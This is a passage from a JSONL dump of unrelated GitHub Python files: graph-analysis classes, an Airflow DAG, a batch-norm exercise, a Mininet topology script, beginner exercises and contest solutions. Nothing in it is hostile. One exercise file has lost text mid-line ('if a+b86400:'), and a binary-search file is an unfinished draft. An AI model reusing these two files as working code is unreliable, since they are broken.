total_added))\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/2650.py","file_name":"2650.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16919560898","text":"import networkx as nx \n\nfrom constants import *\nimport variables as var\n\nfrom utils.developerClass import DeveloperEmpirical\n\nclass Network:\n def __init__(self, net):\n self.net = net\n \n def getNet(self):\n return self.net\n\n # net attribs\n def setNetAttrib(self, attribName, attribValue):\n self.net.graph[attribName] = attribValue\n\n def setInitialDate(self, d):\n self.net.graph[NET_INITIAL_DATE] = d\n\n def attribInNet(self, attribName):\n return attribName in self.net.graph\n\n def getNetAttrib(self, attribName):\n return self.net.graph[attribName]\n\n # nodes\n def addNode(self, item, type=None, otherAttribs=None):\n if item not in self.net:\n if type != None and otherAttribs != None:\n self.net.add_node(item, type=type, **otherAttribs)\n if type != None:\n self.net.add_node(item, type=type)\n else:\n self.net.add_node(item)\n\n def hasNode(self, item):\n return self.net.has_node(item)\n\n def getOrCreateDeveloper(self, devInfo):\n sDevInfo = devInfo.split(\";\")\n\n if len(sDevInfo) == 2:\n name, email, login = sDevInfo[0], sDevInfo[1], \"None\"\n elif len(sDevInfo) == 3:\n login, name, email = sDevInfo[0], sDevInfo[1], sDevInfo[2]\n\n devsPoints = {}\n for devEmpiricalInstance in 
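The Code Jam "standing ovation" solution above sweeps shyness levels and recruits friends whenever too few people are already standing. The same greedy logic as a named, testable function (my restatement of the record's loop, not new logic):

```python
def friends_needed(s_max, audience):
    """Greedy sweep over shyness levels; add friends whenever too few stand."""
    added, standing = 0, audience[0]
    for shyness in range(1, s_max + 1):
        if audience[shyness] > 0 and standing < shyness:
            added += shyness - standing   # recruit just enough to unlock this level
            standing = shyness
        standing += audience[shyness]
    return added

print(friends_needed(5, [1, 1, 0, 0, 1, 1]))   # 2
print(friends_needed(1, [0, 9]))               # 1
```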
self.getDeveloperNodes():\n points = 0\n if name != \"None\":\n if devEmpiricalInstance.getName() == name:\n points += 1\n if email != \"None\":\n if devEmpiricalInstance.getEmail() == email:\n points += 1\n if login != \"None\":\n if devEmpiricalInstance.getLogin() == login:\n points += 1\n if points != 0:\n devsPoints[devEmpiricalInstance] = points\n\n if devsPoints == {}:\n d = DeveloperEmpirical(name, login, email)\n self.net.add_node(d, type=DEV_TYPE)\n else:\n d = max(devsPoints, key=devsPoints.get)\n \n return d\n\n def removeNode(self, item):\n if item in self.net.nodes():\n self.net.remove_node(item)\n\n def getNodes(self, getAttribs = False):\n return self.net.nodes(data=getAttribs) \n\n def getFileNodes(self):\n return list(dict(filter(lambda n: n[1][\"type\"] == FILE_TYPE, self.net.nodes(data=True))).keys())\n\n def getMethodNodes(self):\n return list(dict(filter(lambda n: n[1][\"type\"] == METHOD_TYPE, self.net.nodes(data=True))).keys())\n\n def getFileNodesNotEliminated(self):\n return list(filter(lambda x: not x.startswith(\"ELIMINATED_\"), dict(filter(lambda n: n[1][\"type\"] == FILE_TYPE, self.net.nodes(data=True))).keys()))\n\n def getDeveloperNodes(self):\n return list(dict(filter(lambda n: type(n[0]) == DeveloperEmpirical, self.net.nodes(data=True))).keys())\n\n def getDevNamed(self, name):\n devs = {d.name: d for d in self.getDeveloperNodes()}\n if name in devs.keys():\n return devs[name]\n else:\n return -1\n\n def getNodeAttributes(self, attrib):\n return dict(nx.get_node_attributes(self.net, attrib))\n\n def setNodeAttributes(self, attrib):\n nx.set_node_attributes(self.net, attrib)\n\n def relabelNodes(self, relabel, copy=False):\n nx.relabel_nodes(self.net, relabel, copy=copy)\n\n # edges\n\n def addEdgeOrWeightToNetwork(self, item1, item2, newWeight=1, types=None, weightName=ST_WEIGHT, date=None):\n net = self.getNet()\n\n if types != None: \n if item1 not in net.nodes():\n net.add_node(item1, type=types[0])\n if item2 not in net.nodes():\n net.add_node(item2, type=types[1])\n else:\n if item1 not in net.nodes():\n net.add_node(item1)\n if item2 not in net.nodes():\n net.add_node(item2)\n\n e = (item1, item2)\n if net.get_edge_data(*e) != None:\n if weightName not in net.get_edge_data(*e):\n edgeAttributes = net.get_edge_data(*e)\n edgeAttributes[weightName] = newWeight\n nx.set_edge_attributes(net, {e: edgeAttributes})\n else:\n edgeAttributes = net.get_edge_data(*e)\n edgeAttributes[weightName] += newWeight\n if date != None:\n edgeAttributes[\"commitsInfo\"][date] = PLACE_HOLDER\n nx.set_edge_attributes(net, {e: edgeAttributes})\n else:\n net.add_edge(*e, **{weightName: newWeight, \"commitsInfo\": {date: PLACE_HOLDER}})\n\n def getEdgesOfNode(self, node):\n return self.net.edges(node)\n\n def getEdgeData(self, n1, n2, attrib):\n return self.net.get_edge_data(n1, n2)[attrib]\n \n # degree\n def getDegrees(self, nbunch=None, weight=None):\n if nbunch == None and weight == None:\n return dict(nx.degree(self.net))\n elif nbunch == None and weight != None:\n return dict(nx.degree(self.net, weight=weight))\n elif nbunch != None and weight == None:\n return dict(nx.degree(self.net, nbunch=nbunch))\n elif nbunch != None and weight != None:\n return dict(nx.degree(self.net, nbunch=nbunch, weight=weight))\n\n def getDegree(self, n, weight=None):\n return self.getDegrees(weight=weight)[n]\n\n def degreeOfNode(self, node, weight=None):\n if weight == None:\n return self.net.degree(node)\n else:\n return self.net.degree(node, weight=weight)\n\n def saveNet(self):\n 
nx.write_gpickle(self.net, self.net.graph[\"netPath\"])\n\n# -----\n\nclass devToDevNetworks():\n def __init__(self, fileOrMethodAnalysis, net, devToItem, save=True):\n self.fileOrMethodAnalysis = fileOrMethodAnalysis\n self.D2INet: Network = devToItem\n\n self.net: Network = net\n self.createAndSaveD2DNets()\n\n if save:\n self.net.saveNet()\n \n def createAndSaveD2DNets(self):\n if self.fileOrMethodAnalysis == FILE_TYPE:\n itemNodes = self.D2INet.getFileNodes()\n elif self.fileOrMethodAnalysis == METHOD_TYPE:\n itemNodes = self.D2INet.getMethodNodes()\n \n collaborationPerFile = {}\n\n for iNo in itemNodes: # item can be a file or a method.\n collaborationPerFile[iNo] = 0\n devsConnectedToItem = list(map(lambda x: x[1], self.D2INet.getEdgesOfNode(iNo)))\n for di in range(len(devsConnectedToItem)):\n d1 = devsConnectedToItem[di]\n diDates = self.D2INet.getEdgeData(d1, iNo, 'commitsInfo')\n if di + 1 != len(devsConnectedToItem):\n for dj in range(di + 1, len(devsConnectedToItem)):\n d2 = devsConnectedToItem[dj]\n\n djDates = self.D2INet.getEdgeData(d2, iNo, 'commitsInfo')\n numberOfCommitsInCollaborationTR = self.c_count(diDates, djDates)\n collaborationPerFile[iNo] += numberOfCommitsInCollaborationTR\n if numberOfCommitsInCollaborationTR != 0:\n self.net.addEdgeOrWeightToNetwork(d1, d2, newWeight=numberOfCommitsInCollaborationTR, weightName=D2D_WEIGHT)\n\n\n n: Network = self.net\n\n # Saving D2I weighted degree to D2D nodes attributes\n devNodes = self.D2INet.getDeveloperNodes()\n if self.fileOrMethodAnalysis == FILE_TYPE:\n attribName = F_CHANGES_BY_DEV\n else:\n attribName = M_CHANGES_BY_DEV\n n.setNodeAttributes({k: {attribName: v} for k, v in self.D2INet.getDegrees(nbunch=devNodes, weight=ST_WEIGHT).items()})\n \n self.net.setNetAttrib(COLLAB_PER_FILE, collaborationPerFile)\n \n def c_count(self, commitsInfo1, commitsInfo2):\n maximumSecondsIntervalToConsiderCollaboration = 60 * 60 * 24 * 31 * var.MAX_MONTHS_COLLAB\n collabNr = 0\n i, j = 0, 0\n datesI, datesJ = list(commitsInfo1.keys()), list(commitsInfo2.keys())\n while (i < len(datesI) and j < len(datesJ)):\n d1 = datesI[i]\n d2 = datesJ[j]\n\n if abs((d2 - d1).total_seconds()) < maximumSecondsIntervalToConsiderCollaboration:\n collabNr += 1\n i += 1\n j += 1\n \n elif d1 > d2:\n j += 1\n \n elif d1 < d2:\n i += 1\n \n return collabNr","repo_name":"josemiguelpgomes/MasterThesis","sub_path":"code/utils/networksClasses.py","file_name":"networksClasses.py","file_ext":"py","file_size_in_byte":8550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19347931439","text":"from airflow.providers.cncf.kubernetes.operators.kubernetes_pod import KubernetesPodOperator\nfrom airflow.decorators import dag, task\nimport pendulum\n\n\n@dag(\n schedule_interval=None,\n start_date=pendulum.datetime(2021, 1, 1, tz='UTC'),\n catchup=False,\n tags=['legacy']\n)\ndef example_scraper():\n @task\n def scrape():\n k = KubernetesPodOperator(\n name=\"example_scraper\",\n image=\"example_scraper\",\n cmds=[\"python3\", \"scrape.py\", \"--scraper_type\", \"example_scraper\", \"--url\", \"https://www.google.com\"],\n task_id=\"example-scraper\",\n do_xcom_push=True,\n )\n scrape()\n\nsample_dag = example_scraper()\n","repo_name":"SourceGroove/dags","sub_path":"dags/example_scraper_dag.py","file_name":"example_scraper_dag.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34835068564","text":"import 
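The `networksClasses` record above implements `addEdgeOrWeightToNetwork` with explicit `nx.set_edge_attributes` calls. A more compact standalone equivalent of the create-or-increment edge-weight pattern (illustrative sketch, not the project's code):

```python
import networkx as nx

def add_edge_or_weight(g, u, v, w=1, weight_name="weight"):
    """Create edge u-v with weight w, or add w to the existing weight."""
    if g.has_edge(u, v) and weight_name in g[u][v]:
        g[u][v][weight_name] += w
    else:
        g.add_edge(u, v, **{weight_name: w})

g = nx.Graph()
add_edge_or_weight(g, "dev1", "file.py")
add_edge_or_weight(g, "dev1", "file.py", w=2)
print(g["dev1"]["file.py"]["weight"])   # 3
```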
numpy as np\nimport cv2\n\n# eps may help you to deal with numerical problem\neps = 1e-5\n\n# rho is the decay rate of running average\nrho = 0.5\n\n# initialize batchnorm runtime mean and var per channel\nmean = 0\nvar = 0\n\n\ndef bn_forward_test(x, gamma, beta, mean, var):\n # X \\in R^{B \\times C} where B is the batch size and C is the number of channels\n # gamma \\in R^{C} and beta \\in R^{C} are the parameters of the BN layer\n # mean \\in R^{C} and var \\in R^{C} are the running mean and var of the BN layer\n\n # nomalize the input per channel\n x_hat = (x - mean) / np.sqrt(var + eps)\n\n # scale and shift\n out = gamma * x_hat + beta\n\n return out\n\n\ndef bn_forward_train(x, gamma, beta):\n # X \\in R^{B \\times C} where B is the batch size and C is the number of channels\n # gamma \\in R^{C} and beta \\in R^{C} are the parameters of the BN layer\n # gamma is the scale and beta is the bias\n\n # compute per channel mean and var\n sample_mean = np.mean(x, axis=0)\n sample_var = np.var(x, axis=0)\n\n # nomalize the input per channel\n x_hat = (x - sample_mean) / np.sqrt(sample_var + eps)\n\n # scale and shift\n out = gamma * x_hat + beta\n\n # update running mean and var\n global mean, var\n mean = rho * mean + (1 - rho) * sample_mean\n var = rho * var + (1 - rho) * sample_var\n\n # save intermidiate variables for computing the gradient when backward\n cache = (gamma, x, sample_mean, sample_var, x_hat)\n return out, cache\n\n\ndef bn_backward(dout, cache):\n # dout \\in R^{B \\times C} is the gradient of the loss with respect to the output of the BN layer\n # cache is the intermidiate variables computed in the forward pass\n\n gamma, _, _, sample_var, x_hat = cache\n\n dgamma = np.sum(x_hat * dout, axis=0) # shape: (C,)\n dbeta = np.sum(dout, axis=0) # shape: (C,)\n dx = dout * gamma / np.sqrt(sample_var + eps) # shape: (B, C)\n\n return dx, dgamma, dbeta\n\n# This function may help you to check your code\n\n\ndef print_info(x):\n print('mean:', np.mean(x, axis=0))\n print('var:', np.var(x, axis=0))\n print('------------------')\n return\n\n\nif __name__ == \"__main__\":\n\n # input data\n train_data = np.zeros((9, 784))\n for i in range(9):\n train_data[i, :] = cv2.imread(\n \"mnist_subset/\"+str(i)+\".png\", cv2.IMREAD_GRAYSCALE).reshape(-1)/255.\n gt_y = np.zeros((9, 1))\n gt_y[0] = 1\n\n val_data = np.zeros((1, 784))\n val_data[0, :] = cv2.imread(\n \"mnist_subset/9.png\", cv2.IMREAD_GRAYSCALE).reshape(-1)/255.\n val_gt = np.zeros((1, 1))\n\n np.random.seed(14)\n\n # Intialize MLP (784 -> 16 -> 1)\n MLP_layer_1 = np.random.randn(784, 16)\n MLP_layer_2 = np.random.randn(16, 1)\n\n # Initialize gamma and beta\n gamma = np.random.randn(16)\n beta = np.random.randn(16)\n\n lr = 1e-1\n loss_list = []\n\n # training\n for i in range(50):\n # Forward\n output_layer_1 = train_data.dot(MLP_layer_1)\n output_layer_1_bn, cache = bn_forward_train(\n output_layer_1, gamma, beta)\n # sigmoid activation function\n output_layer_1_act = 1 / (1+np.exp(-output_layer_1_bn))\n output_layer_2 = output_layer_1_act.dot(MLP_layer_2)\n pred_y = 1 / (1+np.exp(-output_layer_2)) # sigmoid activation function\n\n # compute loss\n loss = -(gt_y * np.log(pred_y) + (1-gt_y) * np.log(1-pred_y)).sum()\n print(\"iteration: %d, loss: %f\" % (i+1, loss))\n loss_list.append(loss)\n\n # Backward : compute the gradient of paratmerters of layer1 (grad_layer_1) and layer2 (grad_layer_2)\n grad_pred_y = -(gt_y/pred_y) + (1-gt_y)/(1-pred_y)\n grad_activation_func = grad_pred_y * pred_y * (1-pred_y)\n grad_layer_2 = 
output_layer_1_act.T.dot(grad_activation_func)\n grad_output_layer_1_act = grad_activation_func.dot(MLP_layer_2.T)\n grad_output_layer_1_bn = grad_output_layer_1_act * \\\n (1-output_layer_1_act) * output_layer_1_act\n grad_output_layer_1, grad_gamma, grad_beta = bn_backward(\n grad_output_layer_1_bn, cache)\n grad_layer_1 = train_data.T.dot(grad_output_layer_1)\n\n # update parameters\n gamma -= lr * grad_gamma\n beta -= lr * grad_beta\n MLP_layer_1 -= lr * grad_layer_1\n MLP_layer_2 -= lr * grad_layer_2\n\n # validate\n output_layer_1 = val_data.dot(MLP_layer_1)\n output_layer_1_bn = bn_forward_test(output_layer_1, gamma, beta, mean, var)\n # sigmoid activation function\n output_layer_1_act = 1 / (1+np.exp(-output_layer_1_bn))\n output_layer_2 = output_layer_1_act.dot(MLP_layer_2)\n pred_y = 1 / (1+np.exp(-output_layer_2)) # sigmoid activation function\n loss = -(val_gt * np.log(pred_y) + (1-val_gt) * np.log(1-pred_y)).sum()\n print(\"validation loss: %f\" % (loss))\n loss_list.append(loss)\n\n np.savetxt(\"../results/bn_loss.txt\", loss_list)\n","repo_name":"ateb14/Intro2CV","sub_path":"02_assignment/batch_normalization/bn.py","file_name":"bn.py","file_ext":"py","file_size_in_byte":4875,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33301373136","text":"# Uses python3\nimport sys\n\ndef binary_search(val, points, left, right, direction):\n print('\\nfirst call val:', val, points, 'left:', left, 'right:', right)\n # l, r = -1, -1\n if right - left == 0:\n print('right == left', left)\n return left\n\n mid = ((right - left) // 2) + left\n print('mid:', mid)\n if val == points[mid]:\n # if mid has no repeated values\n if points[mid-1] != val and points[mid+1] != val:\n print('mid, single:', mid)\n return (mid)\n\n if direction == 'left':\n if 0 < mid and mid <= len(points)//2 and points[mid-1] == val:\n print('left call')\n l = binary_search(val, points, 0, mid-1, 'left')\n elif 0 < mid and mid <= len(points)//2 and points[mid-1] != val:\n l = mid\n print('hit left end:', l)\n return mid\n elif mid == 0 and points[mid] == val:\n print('hit left end of array')\n l = mid\n return l\n return l\n # if values are repeatd to the right of mid\n if direction == 'right':\n if len(points)//2 <= mid and mid < len(points)-1 and points[mid+1] == val:\n print('right call')\n print('val:', val, points, 'mid:', mid, 'right:', right)\n r = binary_search(val, points, mid+1, len(points)-1, 'right')\n elif len(points)//2 <= mid and mid < len(points)-1 and points[mid+1] != val:\n # if points[mid+1] > val, then call binary_search again? 
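A cheap sanity check for a hand-written batch-norm backward pass like `bn_backward` above is a finite-difference probe. This standalone sketch checks only the beta gradient under the assumed loss `sum(out)`, whose derivative with respect to each `beta[c]` is exactly the batch size (my test harness, not part of bn.py):

```python
import numpy as np

eps = 1e-5

def bn_forward(x, gamma, beta):
    """Per-channel batch norm forward pass over a (B, C) batch."""
    mu, var = x.mean(axis=0), x.var(axis=0)
    x_hat = (x - mu) / np.sqrt(var + eps)
    return gamma * x_hat + beta

rng = np.random.default_rng(0)
x = rng.standard_normal((4, 3))
gamma, beta = rng.standard_normal(3), rng.standard_normal(3)

# d(sum(out))/dbeta[c] should be exactly B = 4 for every channel.
h = 1e-6
for c in range(3):
    b_plus = beta.copy()
    b_plus[c] += h
    num = (bn_forward(x, gamma, b_plus).sum() - bn_forward(x, gamma, beta).sum()) / h
    print(f"channel {c}: numeric dbeta = {num:.4f} (expect 4.0)")
```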
And return val if right == left?\n # elif mid >= len(points)//2 and mid < len(points)-1 and points[mid+1] != val:\n ('hit right end')\n r = mid\n return r\n elif mid == len(points)-1 and points[mid] == val:\n print('hit right end of array')\n r = mid\n return r\n return r\n #print('l', l, 'r', r)\n #return (l, r)\n elif val < points[mid]:\n return binary_search(val, points, left, mid-1, direction)\n else:\n return binary_search(val, points, mid+1, right, direction)\n\n # check if midpoint is == val, are there other vals left/right?\n # find left index and right index\n\n # return tuple of index of leftmost/rightmost value, how to determine which direction?\n # run just binary_search with dummy arrays\n\ndef fast_count_segments(starts, ends, points):\n cnt = [0] * len(points)\n ordered = sorted(points)\n # print(points, ordered)\n #write your code here\n for i in range(len(starts)):\n if starts[i] == ends[i]:\n left = binary_search(starts[i], ordered, 0, len(points)-1, 'left')\n right = binary_search(ends[i], ordered, 0, len(points)-1, 'right')\n print(left, right)\n else:\n left = binary_search(starts[i], ordered, 0, len(points)-1, 'left')\n right = binary_search(ends[i], ordered, 0, len(points)-1, 'right')\n print(left, right)\n # take tuple range\n # calculate number of points\n # update cnt array, search for indexes in points\n # matching search value\n return cnt\n\n\n\n# def naive_count_segments(starts, ends, points):\n# cnt = [0] * len(points)\n# for i in range(len(points)):\n# for j in range(len(starts)):\n# if starts[j] <= points[i] <= ends[j]:\n# cnt[i] += 1\n# return cnt\n\nif __name__ == '__main__':\n # input = sys.stdin.read()\n # data = list(map(int, input.split()))\n # n = data[0]\n # m = data[1]\n # starts = data[2:2 * n + 2:2]\n # ends = data[3:2 * n + 2:2]\n # points = data[2 * n + 2:]\n # points = [1, 2, 3, 3, 3]\n # points = [3,3,3,4,5]\n # points = [1, 2, 3, 3, 3, 4, 5]\n points = [1,2,3,4,5]\n points.sort()\n print(binary_search(5, points, 0, len(points)-1, 'left'))\n # print('\\nfast count')\n # fast_count_segments([2],[3], points)\n # # print(points)\n # print(starts, ends)\n #use fast_count_segments\n # cnt = naive_count_segments(starts, ends, points)\n # for x in cnt:\n # print(x, end=' ')\n\n# test0 - 1 0 0\n# test1 - 0 0 1\n# test2 - 2 0\n\n# foreach segment - binary search endpoints in points, get indexes then subtract\n# sort points\n# get range of indices (duplicates?) and use for count for each segment\n","repo_name":"psd314/algos","sub_path":"algorithmic_toolbox/week4_divide_and_conquer/5_organizing_a_lottery/points_and_segments_v0.py","file_name":"points_and_segments_v0.py","file_ext":"py","file_size_in_byte":4389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12945591682","text":"import sys\nimport math\n\ndef calculate_traingle_area():\n a = int(input(\"Första sidlängd: \"))\n b = int(input(\"Andra sidlängd: \"))\n c = int(input(\"Tredje sidlängd: \"))\n if a+b86400:\n dag = restSek//86400\n restSek = restSek - 86400*dag\n if restSek>3600:\n timma = restSek//3600\n restSek = restSek - 3600*timma\n if restSek>60:\n minut = restSek//60\n restSek = restSek - 60*minut\n print(sekund, \"sekunder är lika med:\", dag, \"dag(ar),\", timma, \"h,\", minut, \"min,\", restSek, \"sekunder\")\n\ndef siffersumma():\n tal = input(\"Vilket tal ska siffersumman beräknas till? 
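The points_and_segments draft above hand-rolls recursive searches for the leftmost and rightmost occurrence of a value; the standard library's `bisect_left`/`bisect_right` give those boundaries directly. One possible completed version of the plan sketched in its comments, using a difference array over point ranks (my reconstruction, not the author's final code):

```python
from bisect import bisect_left, bisect_right

def fast_count_segments(starts, ends, points):
    """cnt[i] = number of segments [s, e] containing points[i]."""
    order = sorted(range(len(points)), key=lambda i: points[i])
    ordered = [points[i] for i in order]
    diff = [0] * (len(points) + 1)            # difference array over point ranks
    for s, e in zip(starts, ends):
        lo = bisect_left(ordered, s)          # rank of leftmost point >= s
        hi = bisect_right(ordered, e)         # one past rightmost point <= e
        diff[lo] += 1
        diff[hi] -= 1
    cnt, running = [0] * len(points), 0
    for rank, idx in enumerate(order):        # prefix-sum back to original order
        running += diff[rank]
        cnt[idx] = running
    return cnt

print(fast_count_segments([0, 7], [5, 10], [1, 6, 11]))   # [1, 0, 0]
```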
\")\n total = 0\n for num in tal:\n total += int(num)\n print(\"Siffersumma:\", total)\n\ndef harmsum():\n n = int(input(\"Hur många termer? \"))\n summa=0.0\n for i in range(1, n+1):\n summa = summa + (1/i)\n print(\"Summan är:\", summa)\n\ndef antal_termer():\n malsumma = float(input(\"Vilket värde ska summan överskrida? \"))\n n = 0\n summa=0\n while malsumma>summa:\n n += 1\n summa += 1/n\n print(n, \"stycken termer behövs för att summan ska överskrida\", malsumma)\n\ndef check_duplicates():\n inputList = input(\"Give me a list \").split(\" \")\n inputList.sort()\n for i in range(len(inputList)-1):\n if inputList[i]==inputList[i+1]:\n print(\"There is atleast one duplicate!\")\n break\n\ndef chess_board():\n n=0\n row = 0\n while row < 8:\n n=row\n for i in range (1, 9):\n if n%2==0:\n print(\"*\", end=' ')\n else:\n print(\" \", end=' ')\n n += 1\n print()\n row += 1\n\n\ndef menu():\n print(\"Options\")\n print(\"1: Triangelarea\")\n print(\"2: Sekundkonvertering\")\n print(\"3: Siffersumma\")\n print(\"4: Harmsum\")\n print(\"5: Antal termer\")\n print(\"6: Leta duplicates\")\n print(\"7: Chess\")\n print(\"8: Exit\")\n return int(input(\"Ditt val: \"))\n\nwhile True:\n n = menu()\n if n == 1:\n calculate_traingle_area()\n elif n == 2:\n sekund_konverterare()\n elif n == 3:\n siffersumma()\n elif n == 4:\n harmsum()\n elif n == 5:\n antal_termer()\n elif n == 6:\n check_duplicates()\n elif n == 7:\n chess_board()\n elif n == 8:\n break\n else:\n print(n, \"är inte ett giltigt val.\")\n print()\n#calculate_traingle_area(3, 4, 5)\n#sekund_konverterare()\n#siffersumma()\n#harmsum()\n#antal_termer()\n","repo_name":"Theo-Ing/completed-projects","sub_path":"Övning2/ovning.py","file_name":"ovning.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24711275018","text":"import os\nfrom int_cfg import *\n\ndef run_cfg(model_dir):\n\n vxlan_id = 10\n vxlan_group = '239.0.0.10'\n vxlan_mtu = 1300\n\n h1_vxlan_cfg = VxlanConfig( vxlan_id, vxlan_group, '10.2.1.1', 24, '00:11:22:33:44:51', vxlan_mtu )\n h2_vxlan_cfg = VxlanConfig( vxlan_id, vxlan_group, '10.2.1.2', 24, '00:11:22:33:44:52', vxlan_mtu )\n h3_vxlan_cfg = VxlanConfig( vxlan_id, vxlan_group, '10.2.1.3', 24, '00:11:22:33:44:53', vxlan_mtu )\n h4_vxlan_cfg = VxlanConfig( vxlan_id, vxlan_group, '10.2.1.4', 24, '00:11:22:33:44:54', vxlan_mtu )\n\n host_cfgs = {\n 'h1' : HostConfig( name = 'h1', mac = '00:c0:a0:a0:00:01', ip = '10.0.1.1', prefix_len = 24, vxlan_cfg = h1_vxlan_cfg ),\n 'h2' : HostConfig( name = 'h2', mac = '00:c0:a0:a0:00:02', ip = '10.0.2.2', prefix_len = 24, vxlan_cfg = h2_vxlan_cfg ),\n 'h3' : HostConfig( name = 'h3', mac = '00:c0:a0:a0:00:03', ip = '10.0.3.3', prefix_len = 24, vxlan_cfg = h3_vxlan_cfg ),\n 'h4' : HostConfig( name = 'h4', mac = '00:c0:a0:a0:00:04', ip = '10.0.4.4', prefix_len = 24, vxlan_cfg = h4_vxlan_cfg )\n }\n\n leaf1_port_cfgs = [\n PortConfig( port_no = 0, ip = '10.0.1.100', prefix_len = 24, mac = '00:01:00:00:00:01' ),\n PortConfig( port_no = 1, ip = '10.0.2.100', prefix_len = 24, mac = '00:01:00:00:00:02' ),\n ] \n\n leaf2_port_cfgs = [\n PortConfig( port_no = 0, ip = '10.0.3.100', prefix_len = 24, mac = '00:02:00:00:00:01' ),\n PortConfig( port_no = 1, ip = '10.0.4.100', prefix_len = 24, mac = '00:02:00:00:00:02' ),\n ]\n\n switch_cfgs = [\n SwitchConfig( name = 'leaf1', \n port_cfgs = leaf1_port_cfgs,\n swapi_port = 26000,\n\t\t bmcli_port = 27000,\n config_fs = 
'configs/leaf1/l3_int_ref_topo',\n\t\t model_dir = model_dir,\n switch_id = 0x000000A1, pps=400, qdepth=15 ),\n SwitchConfig( name = 'leaf2',\n port_cfgs = leaf2_port_cfgs,\n swapi_port = 26001,\n bmcli_port = 27001,\n config_fs = 'configs/leaf2/l3_int_ref_topo',\n model_dir = model_dir,\n switch_id = 0x000000A2, pps=400, qdepth=15 ),\n SwitchConfig( name = 'spine1',\n port_cfgs = [],\n swapi_port = 26002,\n bmcli_port = 27002,\n config_fs = 'configs/spine1/l3_int_ref_topo',\n model_dir = model_dir,\n switch_id = 0x000000B1, pps=400, qdepth=15 ),\n SwitchConfig( name = 'spine2',\n port_cfgs = [],\n swapi_port = 26003,\n bmcli_port = 27003,\n config_fs = 'configs/spine2/l3_int_ref_topo',\n model_dir = model_dir,\n switch_id = 0x000000B2, pps=400, qdepth=15 ),\n ]\n\n link_cfgs = [\n LinkConfig( 'leaf1', 'h1', 0 ),\n LinkConfig( 'leaf1', 'h2', 1 ),\n LinkConfig( 'leaf1', 'spine1', 2, 0 ),\n LinkConfig( 'leaf1', 'spine2', 3, 0 ),\n\n LinkConfig( 'leaf2', 'h3', 0 ),\n LinkConfig( 'leaf2', 'h4', 1 ),\n LinkConfig( 'leaf2', 'spine1', 2, 1 ),\n LinkConfig( 'leaf2', 'spine2', 3, 1 ),\n ]\n\n mgr = NetworkManager( host_cfgs.values(), switch_cfgs, link_cfgs )\n net = mgr.setupAndStartNetwork()\n\n h1 = net.get('h1')\n h2 = net.get('h2')\n h3 = net.get('h3')\n h4 = net.get('h4')\n\n h1.cmd(\"iperf -s &\")\n h2.cmd(\"iperf -s &\")\n h3.cmd(\"iperf -s &\")\n h4.cmd(\"iperf -s &\")\n\n # TODO: start iperf clients\n h1.cmd(\"iperf -c 10.2.1.4 -t 3000 > /dev/null &\")\n h3.cmd(\"iperf -c 10.2.1.2 -t 3000 > /dev/null &\")\n\n CLI(net)\n\n mgr.cleanup()\n net.stop()\n\nargs = sys.argv\nif len(args) < 2:\n print('Too few arguments. Run the script as follows:')\n print('eg: sudo ./%s --model-dir=$INSTALL_DIR' %\n os.path.basename(__file__))\n exit(1)\n\nif '--model-dir' in args[1]:\n model_dir = args[1].split(\"=\")[1]\nelse:\n print('Invalid format. 
Run the script as follows:')\n print('eg: sudo ./%s --model-dir=$INSTALL_DIR' %\n os.path.basename(__file__))\n exit(1)\n\nmodel_dir = os.path.join(model_dir, 'bin')\n\n# cleanup from previous run\nos.system('./int_cleanup.sh > /dev/null 2>&1')\nrun_cfg(model_dir)\n","repo_name":"p4lang/p4factory","sub_path":"mininet/int_ref_topology.py","file_name":"int_ref_topology.py","file_ext":"py","file_size_in_byte":4167,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"61"} +{"seq_id":"16990587726","text":"from .models import *\nfrom rest_framework import viewsets, permissions\nfrom .serializers import *\n\n\n#Dates Viewset\nclass DatesViewSet(viewsets.ModelViewSet):\n queryset = Dates.objects.all()\n permission_class = [\n permissions.AllowAny\n ]\n serializer_class = DatesSerializer\n\n\n#Project Viewset\nclass ProjectViewSet(viewsets.ModelViewSet):\n queryset = Project.objects.all()\n permission_class = [\n permissions.AllowAny\n ]\n serializer_class = ProjectSerializer","repo_name":"Irenyak1/UETCL-dash","sub_path":"dates/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22006361723","text":"import sys; sys.stdin = open(\"input/4796.txt\", \"r\")\n# 인덱스 설정 위치에 유의하기\nindex = 1\nwhile True:\n L, P, V = map(int, input().split())\n if L == 0 and P == 0 and V == 0:\n break\n result = (V // P * L) + min((V % P), L)\n print(\"Case {}: {}\".format(index, result))\n index += 1","repo_name":"vreez/APS","sub_path":"boj/boj_4796_캠핑.py","file_name":"boj_4796_캠핑.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23406458301","text":"#!/usr/bin/env python\n\nimport re\nimport itertools\n\n\ndef substrings(n):\n return (n[r] for r in itertools.starmap(slice, itertools.combinations(range(len(n)+1), 2)))\n\n\ndef hasconsonants(n):\n v = re.compile(r'[^aeiou]{%s}' % n)\n\n def _f(name):\n return bool(v.search(name))\n return _f\n\n\ndef solve(fin):\n name, n = next(fin).split()\n n = int(n)\n return sum(map(hasconsonants(n), substrings(name)))\n\nif __name__ == '__main__':\n fn = 'A-small-attempt0'\n fin = open(fn + '.in')\n fout = open(fn + '.out', 'w')\n T = int(next(fin))\n for i in range(1, T + 1):\n print(\"Case #{}:\".format(i), solve(fin), file=fout)\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_126/391.py","file_name":"391.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 